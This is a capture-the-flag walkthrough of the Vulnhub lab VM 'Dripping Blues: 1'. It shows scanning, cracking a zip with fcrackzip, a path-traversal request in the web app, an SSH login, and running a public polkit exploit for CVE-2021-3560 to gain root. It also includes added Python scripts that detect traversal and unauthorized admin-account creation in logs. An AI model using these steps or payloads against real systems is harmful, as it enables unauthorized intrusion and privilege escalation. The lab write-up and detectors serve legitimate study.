Vulnhub Practice Log (Dripping Blues: 1)

author:AILX10
  • English name: Dripping Blues: 1
  • Chinese name: dripping blues: 1
  • Published date: September 19, 2021
  • Difficulty: Easy
  • Description: About VM: Test and export from VirtualBox. Enable DHCP and nested VTX/AMDV. You can contact me via email for troubleshooting or questions.
  • Download: https://www.vulnhub.com/entry/dripping-blues-1,744/

1. The IP address is 192.168.199.242

nmap -sP 192.168.199.0/24   
Nmap scan report for drippingblues.lan (192.168.199.242)           

Host discovery

2. Port scanning, ports 21, 22, and 80 were found

nmap -A 192.168.199.242           

Port scanning

3. Web access

🔥 Home page

4. Brute-force the directories and find clues

└─$ dirb http://192.168.199.242/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Aug 21 14:51:29 2022
URL_BASE: http://192.168.199.242/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.199.242/ ----
+ http://192.168.199.242/index.php (CODE:200|SIZE:138)                                                                                
+ http://192.168.199.242/robots.txt (CODE:200|SIZE:78)                                                                                
+ http://192.168.199.242/server-status (CODE:403|SIZE:280)                                                                            
                                                                                                                                      
-----------------
END_TIME: Sun Aug 21 14:51:34 2022
DOWNLOADED: 4612 - FOUND: 3           

Directory brute-forcing

5. The clue hints that the SSH password has to be calculated

SSH clue hints

6. Investigate port 21: anonymous login is allowed and the file respectmydrip.zip is found there; after downloading it, it turns out that a password is needed to open it

FTP anonymous login

7. Try to crack the file's password, using a 134M wordlist here

rockyou.txt wordlist

8. Start the brute-force attack

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip

PASSWORD FOUND!!!!: pw == 072528035           

Brute-force password cracking

9. Use the password to unpack the archive, which yields a hint and another encrypted archive

just focus on "drip"              

Get the hint and another encrypted archive

10. Try web access and obtain the password imdrippinbiatch

http://192.168.199.242/index.php?drip=../../../../etc/dripispowerful.html           

Get a clue
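
From the defender's side, a request like the one in step 10 stands out in the web server's access log. The following is an added example (not part of the original write-up) that scans access-log lines for directory traversal in query parameters, decoding repeatedly so encoded forms are caught too; the log lines, the client address and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines in Apache combined-log style (not from the VM).
SAMPLE_LOG = [
    '192.168.199.10 - - [21/Aug/2022:14:55:01 +0800] "GET /index.php HTTP/1.1" 200 138',
    '192.168.199.10 - - [21/Aug/2022:14:55:09 +0800] '
    '"GET /index.php?drip=../../../../etc/dripispowerful.html HTTP/1.1" 200 260',
    '192.168.199.10 - - [21/Aug/2022:14:55:20 +0800] '
    '"GET /index.php?drip=%252e%252e%252f%252e%252e%252fetc%252fdripispowerful.html HTTP/1.1" 200 260',
    '192.168.199.10 - - [21/Aug/2022:14:55:31 +0800] "GET /index.php?page=about..html HTTP/1.1" 200 138',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# ".." only counts when it is a whole path segment, so "about..html" is ignored.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded '../' sequences are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal(log_lines):
    """Return (client, parameter, decoded value, status) for suspicious requests."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            decoded = fully_decode(value)
            if TRAVERSAL_RE.search(decoded):
                hits.append((client, name, decoded, int(status)))
    return hits


if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 deserves priority, since it suggests the file outside the web root was actually served.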

11. According to the hint on the login page, the username is thugger

Get the username

12. Log in over SSH and get the regular user's flag

SSH login is successful

Regular user flag

13. Look for a privilege escalation point; a suspicious candidate is /usr/lib/policykit-1/polkit-agent-helper-1

thugger@drippingblues:~$ find / -perm -u=s 2>&1 | grep -v "Permission denied"
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign           

There is a polkit process

14. Exploit the polkit privilege escalation vulnerability[1]

CVE-2021-3560 is an authentication bypass in polkit that allows an unprivileged user to call privileged methods over D-Bus. For this vulnerability we call two privileged methods provided by accountsservice (CreateUser and SetPassword), which allows us to create a privileged user and then set a password for it. Finally, we log in as the created user and escalate to root.

15. Upload the PoC script via SCP

Upload the POC script

16. Run the script, successfully get root privileges, and get the flag

thugger@drippingblues:~$ python3 CVE-2021-3560.py 
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse 
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit 
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
........           

Get root access
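
On the defensive side, the account creation described in step 14 leaves traces in the authentication log. The added example below (not from the original write-up or from the exploit's authors) flags new accounts that land in a privileged group without a polkit authentication for org.freedesktop.accounts.user-administration logged shortly before. The log lines are constructed and simplified; the group names, the 60-second window, the default year and the function name are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed, simplified auth.log lines (not captured from the VM); the message
# shapes are assumed to follow polkitd and shadow-utils syslog output.
SAMPLE_AUTH_LOG = [
    "Aug 21 15:02:11 host polkitd(authority=local): Operator of unix-session:2 "
    "successfully authenticated as unix-user:admin to gain TEMPORARY authorization "
    "for action org.freedesktop.accounts.user-administration",
    "Aug 21 15:02:12 host useradd[2101]: new user: name=backup2, UID=1002, GID=1002",
    "Aug 21 15:02:12 host useradd[2101]: add 'backup2' to group 'sudo'",
    "Aug 21 15:10:40 host useradd[2344]: new user: name=ahmed, UID=1003, GID=1003",
    "Aug 21 15:10:40 host useradd[2344]: add 'ahmed' to group 'sudo'",
    "Aug 21 15:20:00 host useradd[2500]: new user: name=guest1, UID=1004, GID=1004",
]

TS_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) ")
AUTHZ_RE = re.compile(r"polkitd.*successfully authenticated as unix-user:\S+ .*"
                      r"action org\.freedesktop\.accounts\.user-administration")
NEW_USER_RE = re.compile(r"new user: name=([^,\s]+)")
PRIV_GROUP_RE = re.compile(r"add '([^']+)' to group '(?:sudo|wheel|admin)'")


def unauthorized_admin_accounts(lines, window=timedelta(seconds=60), year=2022):
    """Names of new accounts that joined a privileged group although no polkit
    user-administration authentication was logged within `window` beforehand."""
    last_authz = None
    created = {}        # account name -> was a polkit authentication seen in time?
    privileged = set()  # accounts added to sudo/wheel/admin
    for line in lines:
        ts_match = TS_RE.match(line)
        if not ts_match:
            continue
        # Syslog timestamps carry no year, so one is supplied by the caller.
        ts = datetime.strptime(f"{year} {ts_match.group(1)}", "%Y %b %d %H:%M:%S")
        if AUTHZ_RE.search(line):
            last_authz = ts
        elif (m := NEW_USER_RE.search(line)):
            created[m.group(1)] = (last_authz is not None
                                   and timedelta(0) <= ts - last_authz <= window)
        elif (m := PRIV_GROUP_RE.search(line)):
            privileged.add(m.group(1))
    return [name for name, ok in created.items() if name in privileged and not ok]


if __name__ == "__main__":
    print(unauthorized_admin_accounts(SAMPLE_AUTH_LOG))
```

Accounts that root creates directly with useradd also lack a polkit entry, so the result is a triage list to compare against change records rather than a verdict.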

At this point, the experiment is complete~

References

  1. Polkit-exploit: https://github.com/Almorabea/Polkit-exploit

Posted on 2022-08-21 16:29